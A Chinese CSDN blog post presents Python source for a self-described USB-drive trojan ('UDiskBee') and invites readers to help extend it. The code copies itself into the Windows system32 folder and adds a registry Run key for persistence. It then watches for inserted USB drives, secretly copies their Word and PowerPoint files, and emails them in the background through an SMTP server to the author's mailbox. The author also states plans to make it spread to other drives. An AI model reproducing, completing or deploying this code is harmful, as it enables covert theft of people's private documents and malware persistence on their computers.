U盘资料窃取（复制+开机启动+后台发送）

最新推荐文章于 2022-12-06 16:52:07 发布

foolyc

最新推荐文章于 2022-12-06 16:52:07 发布

阅读量3.9k

点赞数 4

分类专栏： python 文章标签： python u盘

本文链接：https://blog.csdn.net/foolyc/article/details/29654649

版权

python 专栏收录该内容

7 篇文章 0 订阅

订阅专栏

原本是想制作一个类似于U盘木马的东东，目前能用户运行程序后实现自我复制到电脑电脑并开机启动，可以随时监控U盘，自动下载电脑上U盘里资料，后台发送给自己，想实现的功能有：最好可以自动侵染到U盘中，以后U盘再插入其他电脑时，可以继续复制

写得非常粗糙，有感兴趣的，大家可以一起完成，私信我

# -*- coding: cp936 -*-
#foolyc CSDN博客：http://blog.csdn.net/foolyc
#博客园：http://www.cnblogs.com/foolyc/
import win32file
import shutil
import os
import time
import _winreg
import subprocess

import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart


def addtoautorun():
    #修改注册表将程序改为开机启动
    key=_winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE,r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0,_winreg.KEY_WRITE)
    _winreg.SetValueEx(key,"UDiskBee",0,_winreg.REG_SZ,r'C:/WINDOWS/system32/UDiskBee.exe')
def getremovabledisk():
    drives=[]
    sign=win32file.GetLogicalDrives()
    drive_all=["A:\\","B:\\","C:\\","D:\\","E:\\","F:\\","G:\\","H:\\","I:\\",
                "J:\\","K:\\","L:\\","M:\\","N:\\","O:\\","P:\\","Q:\\","R:\\",
                "S:\\","T:\\","U:\\","V:\\","W:\\","X:\\","Y:\\","Z:\\"]
    for i in range(25):
        if (sign&1<<i):
            if win32file.GetDriveType(drive_all[i])==2:
                free_bytes,total_bytes,total_free_bytes=win32file.GetDiskFreeSpaceEx(drive_all[i])
                if (total_bytes/1024/1024/1024)<17:
                    drives.append(drive_all[i])
    return drives

def copyfile(drives):
    target_dir='D:/foolbak/'
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)  
    today=target_dir+time.strftime('%Y%m%d%H%M')+'/'
    if not os.path.exists(today):
        os.makedirs(today)    
    for udisk in drives:
        for root, dirs, files in os.walk(udisk):
            for one in files:
                type = os.path.splitext(one)[1]
                if type == ".ppt" or type == ".pptx" or type == ".doc" or type == "docx" :
                    if len(root)>3 and not os.path.exists(today+root[3:]):
                        os.makedirs(today+root[3:])
                    shutil.copy(root+'/'+one,today+root[3:]+'/'+one)

def sendfile(filepath):
    from_mail='**@163.com'
    to_mail='**@qq.com'
    msg=MIMEMultipart()
    msg['From']=from_mail
    msg['To']=to_mail
    msg['Subject']='subject'
    content=MIMEText(open(filepath, 'r').read(), 'base64', 'gb2312')
    content["Content-Type"] = 'application/octet-stream'
    content.add_header('content-disposition','attachment',filename=filepath)  
    msg.attach(content)
    server=smtplib.SMTP('smtp.163.com')
    server.docmd('ehlo','**@163.com')
    server.login('**@163.com','**')
    server.sendmail(from_mail,to_mail,msg.as_string())
    server.quit()

def sendall():
    for root, dirs, files in os.walk('D:/foolbak/'):
        for one in files:
            tempfile=root+'/'+one
            sendfile(tempfile)
            time.sleep(30)



if __name__=="__main__":
    if not os.path.isfile('C:/WINDOWS/system32/UDiskBee.exe'):
        shutil.copy(os.getcwd()+'/'+'UDiskBee.exe','C:/WINDOWS/system32/UDiskBee.exe')
        addtoautorun()
        subprocess.Popen('C:/WINDOWS/system32/UDiskBee.exe')
    else :
        drives_bk=[]
        while 1:
            time.sleep(20)
            drives=getremovabledisk()
            if (drives!=drives_bk)&(len(drives_bk)<len(drives)):
                #new U Disk
                drives_bk=drives
                copyfile(drives)
                sendall()
            if (drives!=drives_bk)&(len(drives_bk)>len(drives)):
                #Disk remove
                drives_bk=drives

参考资料：

http://www.cnblogs.com/xiaowuyi/archive/2012/03/17/2404015.html